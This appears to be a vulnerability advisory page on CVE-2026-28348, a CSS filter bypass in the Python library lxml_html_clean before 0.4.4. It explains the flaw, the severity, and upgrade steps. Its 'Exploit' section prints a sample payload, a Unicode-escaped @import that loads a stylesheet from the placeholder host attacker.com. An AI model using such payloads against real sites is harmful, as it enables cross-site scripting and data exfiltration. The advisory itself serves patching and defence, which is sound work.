lxml_html_clean, CSS Filter Bypass, CVE-2026-28348 (Medium)

Listen to this Post

The vulnerability arises from a flaw in the `_has_sneaky_javascript()` method within the `lxml_html_clean` library (versions prior to 0.4.4). This method is designed to scan CSS content for potentially dangerous keywords like `@import` and `expression()` to prevent malicious script execution. However, the sanitization routine improperly handles backslashes and Unicode escape sequences. Specifically, the function strips backslashes from the input before checking it against its blocklist of dangerous strings. An attacker can craft a CSS string containing a Unicode escape sequence that, after the backslashes are stripped, resolves to a forbidden keyword. For example, an attacker might use `\u0040import` which, after the removal of the backslash prefix (as part of the flawed stripping process), leaves @import. This bypasses the filter because the raw string `@import` was not originally present. Consequently, a malicious user can inject CSS rules that load external style sheets (@import) or enable dynamic CSS expressions (expression()). In older browsers that support these features, this can lead to Cross-Site Scripting (XSS) or the exfiltration of sensitive data via malicious CSS. The issue is resolved in version 0.4.4 by properly decoding Unicode escapes before performing security checks.

dailycve form:

Platform: Python library
Version: <=0.4.3
Vulnerability : CSS filter bypass
Severity: Medium
date: 2026-03-05

Prediction: 2026-02-26

What Undercode Say:

Analytics:

The vulnerability is a sanitization logic flaw (CWE-116) with a CVSS score of 6.1 (Medium). Attack complexity is low, requires no privileges, but does require user interaction.

Exploit:

Example of a malicious CSS payload that bypasses the filter
The payload uses a Unicode escape sequence for the '@' symbol.
Vulnerable code strips backslashes before checking, turning '\u0040import' into '@import'.
MALICIOUS_CSS="<style>p { color: red; \u0040import url('http://attacker.com/malicious.css'); }</style>"
echo "Payload: $MALICIOUS_CSS"
This payload, when processed by the vulnerable library, would allow the attacker's CSS to be imported.

Protection from this CVE:

Update to the patched version using pip
pip install --upgrade lxml-html-clean
Verify the installed version is 0.4.4 or higher
pip show lxml-html-clean | grep Version
If you cannot upgrade immediately, as a temporary workaround, you can disable CSS processing entirely in the Cleaner configuration if your application allows.

Impact:

Successful exploitation allows an attacker to bypass CSS filters, potentially loading external resources or executing dynamic CSS expressions, leading to information disclosure or Cross-Site Scripting (XSS) in vulnerable browser environments.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top